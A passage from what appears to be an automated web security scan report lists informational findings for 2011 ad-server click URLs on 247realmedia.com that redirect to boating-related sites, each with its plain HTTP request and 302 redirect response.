20.224. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1488037985/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1488037985/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1488037985/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1488037985/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:45:31 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.225. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1500213411/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1500213411/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1500213411/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1500213411/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:41:52 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.226. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1500488251/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1500488251/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1500488251/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1500488251/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:49:47 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.227. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1502189804/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1502189804/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1502189804/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1502189804/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:42:51 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.228. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1506780268/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1506780268/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1506780268/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1506780268/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:42:10 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i=2039">here</a>
...[SNIP]...

20.229. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1511666604/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1511666604/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1511666604/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1511666604/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:51:55 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.230. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1516627610/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1516627610/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1516627610/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1516627610/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:54:33 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.231. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1523538657/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1523538657/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1523538657/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1523538657/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:53:23 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.232. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1525091085/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1525091085/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1525091085/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1525091085/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:34:38 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.233. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1526854970/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1526854970/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1526854970/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1526854970/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:43:37 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.234. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1539214827/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1539214827/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1539214827/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1539214827/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:58:48 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i=2039">here</a>
...[SNIP]...

20.235. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1541728132/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1541728132/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1541728132/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1541728132/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:57:42 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.236. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1555761797/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1555761797/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1555761797/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1555761797/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:43:25 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.237. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/156346633/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/156346633/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/156346633/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/156346633/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:42:14 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.238. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1566272500/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1566272500/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1566272500/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1566272500/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
